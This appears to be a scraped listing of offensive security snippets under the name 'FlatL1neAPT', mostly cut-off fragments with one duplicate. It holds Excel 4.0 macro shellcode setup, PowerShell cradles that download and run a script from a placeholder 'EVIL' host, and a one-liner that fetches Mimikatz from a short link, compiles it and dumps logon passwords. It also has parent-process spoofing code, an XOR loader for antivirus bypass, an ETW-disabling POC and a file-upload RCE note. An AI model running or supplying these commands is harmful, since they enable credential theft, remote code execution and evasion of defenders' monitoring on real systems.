FlatL1neAPT

Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".

================================================================================
Paste this in cells in column A, starting in cell A1:
================================================================================

=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
=VAlloc(0;4096;4096;64)

FlatL1neAPT

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

FlatL1neAPT

/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>

#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000

typedef struct _STARTUPINFOEX {
  STARTUPINFO                 StartupInfo;
  LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;

FlatL1neAPT

Remote Code Execution via File Upload (CVE-2020-12255)


The rConfig 3.9.4 is vulnerable to remote code execution due to improper checks/validation via the file upload functionality. 
The vendor.crud.php accepts the file upload by checking through content-type and it is not restricting upload by checking the file extension and header. 
Due to this flaw, An attacker can exploit this vulnerability by uploading a PHP file that contains arbitrary code (shell) and changing the content-type to `image/gif` in the vendor.crud.php. 
since the validation checks are happening through content-type the server would accept the PHP file uploaded ultimately resulting code execution upon the response when invoked. 


Steps To Reproduce-:

FlatL1neAPT

Ripple20, set of vulnerabilities inside Treck / KASAGO IP Stacks

General

• Ripple20 is the codename to a set of 19 vulnerabilities discovered by the cybersecurity team JSOF.
• These vulnerabilities are inside an IP stack, selled under two different names (Treck TCP/IP for U.S market Kasago TCP/IP, for Asia market. -These two stacks were bought and used under privated-labeled by several softwares companies, some known names are: GHnetv2, Kwiknet, Quadnet.
• But there's more, these stacks were also integrated, sometimes with modifications, inside several RTOS (real-time operating system).
• Last, some of the vulnerabilities, depending the device operating system, configuration or location can have greater or lower CVSS score.
• My advice is for companies to ask their suppliers if they use one of this stack and assess the risk following their company risk policy.
• This will not be an easy set of vulnerabilities to patch, sadly.

FlatL1neAPT

<!DOCTYPE html>
<html lang="en" dir="ltr">
	<head>
		<meta charset="utf-8">
		<title></title>
				<h1>working on chrome linux & mac</h1>
    <a href="" target=_blank>click me before</a>
	</head>
	<body>
		<button type="button" id=clickme name="button">click me</button>

FlatL1neAPT

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*

FlatL1neAPT

/*
Author: Arno0x0x, Twitter: @Arno0x0x
Completely based on @Flangvik netloader

This partial rewrite of @Flangvik Netloader includes the following changes:

	- Allow loading of an XOR encrypted binary to bypass antiviruses
		To encrypt the initial binary you can use my Python transformFile.py script.
		Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor
		

FlatL1neAPT

// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)

#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43

FlatL1neAPT

// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)

#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43